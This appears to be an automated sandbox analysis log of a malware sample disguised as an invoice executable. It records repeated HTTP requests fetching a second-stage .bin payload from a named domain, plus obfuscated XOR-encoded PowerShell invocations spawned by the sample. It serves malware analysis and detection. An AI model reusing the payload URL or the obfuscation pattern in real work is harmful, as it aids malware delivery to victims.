Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 000000A7.00000002.6488489505.0000000005E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://libersis.com
Source: INVOICE-98656789.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: INVOICE-98656789.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: CasPol.exe, 000000A7.00000002.6488489505.0000000005E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://twitter.com
Source: CasPol.exe, 000000A7.00000002.6488489505.0000000005E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/
Source: CasPol.exe, 000000A7.00000002.6486948852.0000000004318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.bin
Source: CasPol.exe, 000000A7.00000002.6486948852.0000000004318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.bin2(f
Source: CasPol.exe, 000000A7.00000002.6486948852.000000000435A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.bin3
Source: CasPol.exe, 000000A7.00000002.6486948852.000000000435A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.bin?
Source: CasPol.exe, 000000A7.00000002.6486948852.000000000435A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.binG
Source: CasPol.exe, 000000A7.00000002.6486948852.000000000435A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.binc
Source: CasPol.exe, 000000A7.00000002.6486948852.0000000004318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.binfF
Source: CasPol.exe, 000000A7.00000002.6486948852.000000000435A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.bino
Source: CasPol.exe, 000000A7.00000002.6486948852.0000000004318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.binows
Source: CasPol.exe, 000000A7.00000002.6486948852.0000000004318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.bins
Source: CasPol.exe, 000000A7.00000002.6486948852.0000000004318000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/QjshjCZmm78.bintG3
Source: CasPol.exe, 000000A7.00000002.6486948852.000000000435A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.batimetalelk.com/~
Source: CasPol.exe, 000000A7.00000002.6488489505.0000000005E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/api.js
Source: CasPol.exe, 000000A7.00000002.6488489505.0000000005E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.instagram.com/

Source: unknown

DNS traffic detected: queries for: www.batimetalelk.com

Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6
Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cacheCookie: PHPSESSID=bac026d8052051dd3d39333559426da6

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

0_2_004054CC

Too many similar processes found

Source: powershell.exe	Process created: 152
Source: conhost.exe	Process created: 84

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: INVOICE-98656789.exe

Uses 32bit PE files

Source: INVOICE-98656789.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

0_2_00403395

Detected potential crypto function

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Code function: 0_2_70351B28

0_2_70351B28

Sample file is different than original file name gathered from version info

Source: INVOICE-98656789.exe, 00000000.00000002.3245453364.00000000007B4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameblindages.exe` vs INVOICE-98656789.exe
Source: INVOICE-98656789.exe	Binary or memory string: OriginalFilenameblindages.exe` vs INVOICE-98656789.exe

Tries to load missing DLLs

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll

Source: INVOICE-98656789.exe	Virustotal: Detection: 25%
Source: INVOICE-98656789.exe	ReversingLabs: Detection: 18%

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

File read: C:\Users\user\Desktop\INVOICE-98656789.exe

Jump to behavior

Source: INVOICE-98656789.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\INVOICE-98656789.exe C:\Users\user\Desktop\INVOICE-98656789.exe
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7573672D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x33323865 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x53686D28 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x57696C3B -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F772A36 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72352E36 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30292272 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A412D -bxor 607}
